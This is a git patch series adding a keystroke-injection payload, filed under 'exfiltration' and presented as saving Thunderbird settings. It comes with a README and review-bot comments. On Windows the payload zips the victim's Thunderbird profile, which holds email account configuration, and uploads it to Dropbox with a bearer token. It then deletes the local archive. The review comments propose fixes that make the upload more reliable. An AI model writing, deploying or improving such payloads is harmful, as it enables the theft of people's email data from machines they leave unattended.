From a6055bb32dfa7e1ff9bd0223686ba064313eb879 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 14:12:06 +0200 Subject: [PATCH 1/4] Save Your Thunderbird Settings via Dropbox This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. --- .../Save_Your_Thunderbird_Settings/README.md | 103 +++++++++++++++++ .../payload.txt | 105 ++++++++++++++++++ 2 files changed, 208 insertions(+) create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md new file mode 100644 index 00000000..a5b924fe --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md 
@@ -0,0 +1,103 @@ +# Save Your Thunderbird Settings via Dropbox + +Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature. + +This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration. + +**Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff! + +**Category:** Exfiltration + +## Index + +- [Overview](#overview) +- [Requirements](#requirements) +- [Test Environment](#test-environment) +- [Configuration](#configuration) +- [Functionality](#functionality) + - [System Detection](#system-detection) + - [Opening Thunderbird](#opening-thunderbird) + - [Copying Profile Folder Path](#copying-profile-folder-path) + - [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox) +- [Notes](#notes) +- [Credits](#credits) + +## Overview + +This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox. + +## Requirements + +- **Dropbox Access Token:** You need a valid Dropbox access token to upload the file. +- **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem. +- **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet... 
+ +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## Configuration + +Before running the program, ensure to set the following parameters (*except #DROPBOX_API_CONST that is a constant*) correctly/as you prefer: + +```plaintext +DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +DEFINE #ARCHIVE_NAME cache.zip +DEFINE #DROPBOX_FOLDER_PATH / +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +``` +- `#ACCESS_TOKEN`: Your private Dropbox access token +- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`). +- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`). + +## Functionality + +### System Detection + +The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied. + +### Opening Thunderbird + +The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use. + +### Copying Profile Folder Path + +The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file. + +### Opening PowerShell and Uploading to Dropbox + +Using PowerShell, the script performs the following actions: + +1. **Navigate to TEMP Directory:** Changes the directory to the temporary environment path. +2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used. +3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file. +4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API. +5. **Cleanup:** Removes the local ZIP file after the upload is complete. + +## Notes + +- This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal. 
+- Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt new file mode 100644 index 00000000..3b54e94b --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt 
@@ -0,0 +1,105 @@ +REM ############################################################## +REM # # +REM # Title : Save Your Thunderbird Settings via Dropbox # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Exfiltration # +REM # Target : Windows 10/11 # +REM # # +REM ############################################################## + +REM Required: Set here your Dropbox access TOKEN +DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +DEFINE #ARCHIVE_NAME cache.zip +DEFINE #DROPBOX_FOLDER_PATH / +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +DELAY 500 +ENTER +DELAY 500 +REPEAT 2 UPARROW +DELAY 500 +ENTER +DELAY 500 +REPEAT 3 UPARROW +DELAY 500 +ENTER +DELAY 500 + +REM Inside the settings +REPEAT 11 TAB +DELAY 500 +ENTER +DELAY 500 + +REM INSIDE THE PROFILE FOLDER +REPEAT 4 TAB +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 500 +ALT F4 +DELAY 500 +WIN R +STRING powershell +ENTER +DELAY 1500 + +STRINGLN cd $env:TEMP +DELAY 500 +STRINGLN Stop-Process -Name "thunderbird" -Force +DELAY 500 +STRING Compress-Archive -LiteralPath +DELAY 500 +CTRL v +DELAY 500 +STRINGLN -DestinationPath ./#ARCHIVE_NAME +DELAY 1000 + +STRINGLN + $filePath = "$env:TEMP/#ARCHIVE_NAME" + $filePath = $filePath -replace "\\", "/" + $dropboxPath = 
"#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" + $accessToken = "#ACCESS_TOKEN" + $fileContent = [System.IO.File]::ReadAllBytes($filePath) + $headers = @{ + "Authorization" = "Bearer $accessToken" + "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") + "Content-Type" = "application/octet-stream" + } + Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +END_STRINGLN \ No newline at end of file From af74e3f8cdb1fbf9cf59b0b4e13f68b9d9015e61 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 4 Jun 2024 07:56:26 +0200 Subject: [PATCH 2/4] Update payload.txt --- .../payload.txt | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 3b54e94b..a939d157 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -42,7 +42,7 @@ EXTENSION DETECT_READY CAPSLOCK END_EXTENSION -WIN r +GUI r STRING thunderbird ENTER DELAY 1000 @@ -74,7 +74,7 @@ CTRL c DELAY 500 ALT F4 DELAY 500 -WIN R +GUI r STRING powershell ENTER DELAY 1500 
@@ -91,15 +91,15 @@ STRINGLN -DestinationPath ./#ARCHIVE_NAME DELAY 1000 STRINGLN - $filePath = "$env:TEMP/#ARCHIVE_NAME" - $filePath = $filePath -replace "\\", "/" - $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" - $accessToken = "#ACCESS_TOKEN" - $fileContent = [System.IO.File]::ReadAllBytes($filePath) - $headers = @{ - "Authorization" = "Bearer $accessToken" - "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") - "Content-Type" = "application/octet-stream" - } - Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit + $filePath = "$env:TEMP/#ARCHIVE_NAME" + $filePath = $filePath -replace "\\", "/" + $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" + $accessToken = "#ACCESS_TOKEN" + $fileContent = [System.IO.File]::ReadAllBytes($filePath) + $headers = @{ + "Authorization" = "Bearer $accessToken" + "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") + "Content-Type" = "application/octet-stream" + } + Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit END_STRINGLN \ No newline at end of file From c45a151dd773f9d2cb040691e183d159dafb1d11 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 10:04:12 +0200 Subject: [PATCH 3/4] [+] STRINGLN_POWERSHELL --- .../exfiltration/Save_Your_Thunderbird_Settings/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index a939d157..09b5cab1 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt 
@@ -90,7 +90,7 @@ DELAY 500 STRINGLN -DestinationPath ./#ARCHIVE_NAME DELAY 1000 -STRINGLN +STRINGLN_POWERSHELL $filePath = "$env:TEMP/#ARCHIVE_NAME" $filePath = $filePath -replace "\\", "/" $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" @@ -102,4 +102,4 @@ STRINGLN "Content-Type" = "application/octet-stream" } Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit -END_STRINGLN \ No newline at end of file +END_STRINGLN From 63d74b38078bbcc83808b8589094ab7cb4789fd2 Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 12 Jun 2024 07:27:51 +0200 Subject: [PATCH 4/4] Update payload.txt --- .../exfiltration/Save_Your_Thunderbird_Settings/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 09b5cab1..2bd3168e 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -9,7 +9,7 @@ REM # # REM ############################################################## REM Required: Set here your Dropbox access TOKEN -DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +DEFINE #ACCESS_TOKEN example-access-token DEFINE #ARCHIVE_NAME cache.zip DEFINE #DROPBOX_FOLDER_PATH / DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
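Review bot: in the README hunk of PATCH 1/4, the "Copying Profile Folder Path" subsection says the copied path "is used to compress the profile data into a ZIP file", but the compression itself is done by the `Compress-Archive` command in the PowerShell step described in the next subsection; rephrase so each subsection matches what the payload does at that point. Two smaller fixes in the same hunk: "for istance" should read "for instance", and the Configuration paragraph says `#DROPBOX_API_CONST` is a constant while the PowerShell block never references it (see the payload note below), so either describe it as unused or have the payload use it.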
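Review bot: in the payload.txt hunk of PATCH 1/4, the last line of the STRINGLN block, `Invoke-RestMethod ... -Body $fileContent; rm $filePath; exit`, removes the archive and exits no matter how the request ended, so an expired token or a network error leaves neither the file nor a visible error behind. Gate the cleanup on the result, for example `if ($?) { rm $filePath }`, or wrap the call in try/catch and leave the archive in place on failure. The same block hardcodes `https://content.dropboxapi.com/2/files/upload` although `#DROPBOX_API_CONST` is DEFINEd with exactly that value; reference the constant or drop the unused DEFINE. Also, `Stop-Process -Name "thunderbird" -Force` is followed only 500 ms later by `Compress-Archive`, which can race with Thunderbird still writing its profile; a `Wait-Process -Name thunderbird` between the two makes the archive consistent.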
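Review bot: the third hunk of PATCH 2/4 (`@@ -91,15 +91,15 @@`) removes and re-adds the thirteen body lines of the STRINGLN block with no visible textual difference, so the change must be indentation or line-ending normalization; the commit message "Update payload.txt" should say so, because a whitespace-only change to text that is typed into the target is not distinguishable from a no-op in the rendered diff.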
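Review bot: PATCH 4/4 replaces the `#ACCESS_TOKEN` value in payload.txt with `example-access-token`, but the README added in PATCH 1/4 still shows the old base64 string in its Configuration block and still carries the "Alert!" paragraph claiming a personal token was uploaded; update both in this change so the placeholder is consistent and readers do not mistake the README value for a credential. The commit message "Update payload.txt" should also state that it replaces the token placeholder.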